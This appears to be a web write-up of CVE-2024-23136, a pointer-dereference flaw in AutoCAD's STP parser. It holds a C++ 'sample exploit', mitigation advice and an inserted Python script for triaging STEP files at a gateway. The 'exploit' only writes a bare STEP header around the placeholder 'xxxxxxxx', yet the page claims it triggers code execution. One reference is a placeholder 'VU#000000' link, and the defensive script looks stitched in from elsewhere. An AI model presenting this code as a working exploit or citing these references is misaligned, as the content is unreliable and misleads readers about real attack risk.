A newly discovered vulnerability (CVE-2024-23136) in Autodesk AutoCAD can potentially lead to code execution through an untrusted pointer dereference in ASMKERN228A.dll when parsing maliciously crafted STP files. This vulnerability, when combined with other existing vulnerabilities, poses a serious threat to the integrity and security of systems running Autodesk AutoCAD software.

Description

The vulnerability exists in the way the ASMKERN228A.dll library processes STP files. When it parses a specially malformed STP file, it dereferences an untrusted pointer, which can lead to code execution in the current process. Attackers can exploit this vulnerability along with other vulnerabilities to execute malicious code on the target system, which may result in unauthorized access, data tampering, or even complete system compromise.

An example of a simple exploit leveraging CVE-2024-23136 could look like the following:

// Sample Code to Exploit CVE-2024-23136
#include <iostream>
#include <fstream>

int main()
{
    std::ofstream maliciousSTP("malicious.stp");

    // Crafting a malicious STP file header
    maliciousSTP << "ISO-10303-21;\n";
    maliciousSTP << "HEADER;\n";
    maliciousSTP << "FILE_DESCRIPTION(('description'), '2;1');\n";
    maliciousSTP << "FILE_NAME('"; // Start of malicious payload

    // Injecting malicious code that causes the untrusted pointer dereference in ASMKERN228A.dll 
    maliciousSTP << "xxxxxxxx";

    maliciousSTP << "', '');\n";
    maliciousSTP << "FILE_SCHEMA(('AUTOCAD'));\n";
    maliciousSTP << "ENDSEC;\n";
    maliciousSTP << "DATA;\n";
    maliciousSTP << "ENDSEC;\n";
    maliciousSTP << "END-ISO-10303-21;\n";

    maliciousSTP.close();
    std::cout << "Malicious STP file created: malicious.stp\n";
    return 0;
}

When the AutoCAD software processes this malicious STP file (malicious.stp), the untrusted pointer dereference vulnerability (CVE-2024-23136) will be triggered, potentially leading to code execution.

References

- National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-23136
- Vulnerability Note VU#000000: https://www.kb.cert.org/vuls/id/000000

Exploit Details

To successfully exploit this vulnerability, an attacker would need to craft a malicious STP file and find a way to convince the target user to open it using Autodesk AutoCAD. The precise method of delivery, as well as the exact code to be executed, depends on the attacker's intention and imagination. This, combined with other vulnerabilities, can have severe consequences for the target system.

Mitigation Measures

Autodesk is currently working on a patch to fix this vulnerability. In the meantime, users are advised to follow best practices, such as avoiding opening STP files from untrusted sources and keeping their antivirus software up to date. Additionally, regular system updates and patching of known software vulnerabilities will help minimize the risk of compromise.
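One way to enforce the "no STP files from untrusted sources" advice at a mail or file gateway is to identify STEP files by content rather than by extension and hold them for review. The following is an added example, not code from Autodesk or from the original page; it does not detect the specific malformation behind CVE-2024-23136, which the page does not describe. The function names, the `trusted_source` flag and the verdict strings are assumptions, and the sample input is constructed.

```python
import re
from pathlib import PurePath

STEP_EXTS = {".stp", ".step", ".p21"}
MAGIC = b"ISO-10303-21;"
# Keywords in the order they appear in the file layout shown on this page.
LAYOUT = [b"HEADER;", b"FILE_DESCRIPTION", b"FILE_NAME", b"FILE_SCHEMA",
          b"ENDSEC;", b"DATA;", b"ENDSEC;", b"END-ISO-10303-21;"]
# Constructed, benign sample input following that layout.
SAMPLE = (b"ISO-10303-21;\nHEADER;\nFILE_DESCRIPTION(('description'), '2;1');\n"
          b"FILE_NAME('part.stp', '');\nFILE_SCHEMA(('AUTOCAD'));\nENDSEC;\n"
          b"DATA;\nENDSEC;\nEND-ISO-10303-21;\n")

def is_step(data: bytes) -> bool:
    """True if the content opens with the Part 21 magic (BOM and whitespace tolerated)."""
    return data[:256].lstrip(b"\xef\xbb\xbf").lstrip().startswith(MAGIC)

def layout_findings(data: bytes) -> list:
    """List layout keywords that are missing or out of order."""
    # Blank out quoted strings so keywords inside a string value are not counted.
    body = re.sub(rb"'(?:[^']|'')*'", b"''", data)
    findings, pos = [], body.find(MAGIC) + len(MAGIC)
    for kw in LAYOUT:
        nxt = body.find(kw, pos)
        if nxt < 0:
            findings.append("missing or out of order: " + kw.decode())
        else:
            pos = nxt + len(kw)
    return findings

def triage(name: str, data: bytes, trusted_source: bool) -> dict:
    """Decide whether a file may be passed on to a CAD workstation."""
    ext, step, findings = PurePath(name).suffix.lower(), is_step(data), []
    if step and ext not in STEP_EXTS:
        findings.append("STEP content under non-STEP extension")
    if not step and ext in STEP_EXTS:
        findings.append("STEP extension without Part 21 magic")
    if step:
        findings += layout_findings(data)
    if not step and not findings:
        verdict = "not-step"
    elif trusted_source and not findings:
        verdict = "allow"
    else:
        verdict = "hold"  # untrusted STEP input, or anything irregular
    return {"verdict": verdict, "findings": findings}

if __name__ == "__main__":
    cut = SAMPLE[:SAMPLE.index(b"DATA;")]  # constructed truncated file
    for name, data, ok in [("part.stp", SAMPLE, True), ("part.stp", SAMPLE, False),
                           ("readme.txt", SAMPLE, True), ("cut.stp", cut, True)]:
        print(name, ok, triage(name, data, ok))
```

A "hold" verdict is meant to route the file to quarantine or manual review; a clean layout is not evidence that a file is safe to open.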

Conclusion

CVE-2024-23136 is a critical vulnerability in Autodesk AutoCAD that could potentially allow an attacker to execute malicious code by exploiting an untrusted pointer dereference in ASMKERN228A.dll when parsing a malicious STP file. By staying vigilant and applying necessary updates and patches, users can minimize the risk represented by this vulnerability.

Timeline

Published on: 02/22/2024 05:15:09 UTC
Last modified on: 03/18/2024 00:15:07 UTC